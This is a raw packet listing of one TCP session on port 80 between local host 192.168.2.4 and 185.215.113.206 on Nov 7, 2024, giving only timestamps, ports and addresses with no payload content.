Nov 7, 2024 04:12:21.340472937 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340485096 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340492010 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340496063 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340508938 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340514898 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340519905 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340552092 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340552092 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340564013 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340575933 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340593100 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340593100 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340605021 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340610027 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340616941 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340632915 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340636015 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340658903 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340688944 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340699911 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340711117 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340722084 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340735912 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340744972 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340749025 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340760946 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340771914 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340785027 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340800047 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340811968 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340817928 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340823889 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340832949 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340852976 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340867043 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340888977 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340900898 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340910912 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.340924025 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340939999 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.340955019 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341003895 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341015100 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341025114 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341042042 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341046095 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341053963 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341057062 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341067076 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341078043 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341078043 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341089964 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341100931 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341109037 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341139078 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341180086 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341192007 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341202974 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341216087 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341245890 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341267109 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341284037 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341295004 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341300011 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341306925 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341319084 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341331959 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341331959 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341345072 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341348886 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341357946 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341371059 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341396093 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341434956 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341447115 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341458082 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341470003 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341480017 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341480970 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341495991 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341522932 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341522932 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341535091 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341547012 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341566086 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341578007 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341582060 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341588020 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341599941 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341605902 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341618061 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341629982 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341631889 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341641903 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341655970 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341662884 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341665983 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341675043 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341680050 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341691017 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341692924 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341703892 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341720104 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341744900 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341756105 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341767073 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341778040 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341788054 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341797113 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341801882 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341820955 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341842890 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341871977 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341883898 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341895103 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341906071 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341922998 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341922998 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341932058 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341936111 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341948986 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341960907 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.341964006 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.341990948 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342001915 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342006922 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342015028 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342026949 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342027903 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342048883 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342073917 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342075109 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342091084 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342103004 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342112064 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342113972 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342123032 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342127085 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342144012 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342148066 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342154980 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342159986 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342169046 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342192888 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342206955 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342233896 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342246056 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342293024 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342299938 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342328072 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342339039 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342341900 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342356920 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342380047 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342417002 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342428923 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342444897 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342456102 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342462063 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342468977 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342484951 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342485905 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342499018 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342504978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342509985 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342523098 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342533112 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342539072 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342554092 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342576027 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342588902 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342593908 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342600107 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342609882 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342621088 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342627048 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342634916 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342643976 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342653990 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342664003 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342665911 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342678070 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342679024 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342689991 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342691898 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342703104 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342713118 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342715979 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342741013 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342742920 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342752934 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342775106 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342777014 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342787027 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342803955 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342807055 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342814922 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342825890 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342829943 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342838049 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342873096 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342896938 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342907906 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342919111 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342930079 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342935085 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342941999 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342948914 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342958927 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.342974901 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.342998981 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.343002081 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343013048 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343039036 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.343061924 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.343100071 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343111992 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343122005 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343133926 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343146086 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343146086 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.343167067 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.343184948 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.343194962 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343214035 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343226910 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343238115 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343249083 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343249083 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.343260050 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343271971 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343277931 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.343285084 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343287945 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.343302965 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343311071 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.343322992 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343332052 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.343333960 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343347073 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.343353033 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343364954 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343372107 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.343377113 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343394995 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.343417883 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.343421936 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343440056 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343451023 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.343465090 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.343488932 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.381990910 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382070065 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382162094 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382179976 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382210016 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382215023 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382222891 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382232904 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382236004 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382247925 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382260084 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382261038 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382271051 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382282019 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382293940 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382307053 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382313013 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382313013 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382325888 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382335901 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382339954 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382352114 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382363081 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382363081 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382390022 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382391930 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382409096 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382411957 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382421970 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382431984 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382437944 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382443905 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382445097 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382455111 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382467985 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382476091 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382488966 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382499933 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382514954 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382527113 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382538080 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382549047 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382555962 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382560968 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382579088 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382580042 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382591963 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.382601023 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.382631063 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.451932907 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.451955080 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.451971054 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.451993942 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.452024937 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.452176094 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452187061 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452198029 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452234030 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.452238083 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452250004 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452260017 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452271938 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452282906 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.452301979 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.452322960 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.452362061 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452372074 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452382088 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452394962 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452405930 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.452436924 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.452476978 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452487946 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452498913 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452510118 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452514887 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.452522039 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452529907 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.452533960 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452544928 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452555895 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.452586889 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.452596903 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452608109 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452616930 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452625990 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452641010 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.452642918 CET	49755	80	192.168.2.4	185.215.113.206
